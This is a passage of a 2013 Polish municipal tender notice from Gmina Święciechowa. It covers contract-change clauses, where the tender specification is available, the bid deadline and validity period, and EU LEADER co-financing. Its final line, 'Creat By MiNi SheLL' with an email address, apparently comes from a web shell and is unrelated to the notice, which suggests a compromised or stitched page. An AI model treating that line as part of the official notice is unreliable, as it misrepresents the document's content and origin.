7) innych szczególnie uzasadnionych przypadkach, w szczególności   może nastąpić również z powodu wystąpienia siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,  a także z  powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron. 2. Niezależnie od przyczyn i warunków zmiany umowy wskazanych w ust. 1 zmiana warunków niniejszej umowy może nastąpić za zgodą stron także w przypadkach, gdy zmiany są dla Zamawiającego neutralne, np. zmiana adresu lub danych Wykonawcy lub Zamawiającego, zmiana osób reprezentujących Zamawiającego lub Wykonawcę. 3. W przypadku wystąpienia zamówień dodatkowych  stosuje się art. 67, ust. 1 pkt 5 ustawy - Prawo zamówień publicznych. Zamawiający nie zapłaci za dostawy, jeżeli wykonawca wykonał je bez zastosowania art. 67 ust. 1 pkt 5 ustawy  Prawo zamówień publicznych. 4. Strony mają obowiązek niezwłocznie informować się wzajemnie o zmianach adresowych, w przypadku niedochowania tego warunku Pismo Zamawiającego wysłane za pośrednictwem poczty na wskazany w niniejszej umowie adres uważa się za doręczone z dniem odbioru tego pisma albo z dniem upływu 7 dniowego terminu do odbioru pisma liczonego od daty powtórnego awizo.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swieciechowa.pl/dokumenty<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać bezpłatnie z ww. strony. Natomiast za specyfikację w wersji papierowej płaci się przelewem 50 zł na konto nr 58 9043 1083 2834 0036 9875 0007..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2013 godzina 10:00, miejsce: Urząd Gminy w Święciechowie, ul. Ułańska 4, pokój nr  6, piętro I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Na przedmiotową inwestycję został złożony i wybrany do finansowania wniosek 
o dofinansowanie operacji w ramach Programu Obszarów Wiejskich na lata 2007 - 2013, oś 4LEADER, działanie 413 - Wdrażanie lokalnych strategii rozwoju w zakresie operacji, które nie odpowiadają warunkom przyznania pomocy w ramach osi 3 PROW, ale przyczyniają się do osiągnięcia celów tej osi, czyli tzw. małych projektów. Gmina Święciechowa na dzień ogłoszenia przetargu nie ma podpisanej umowy na ww. dofinansowanie ze środków Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com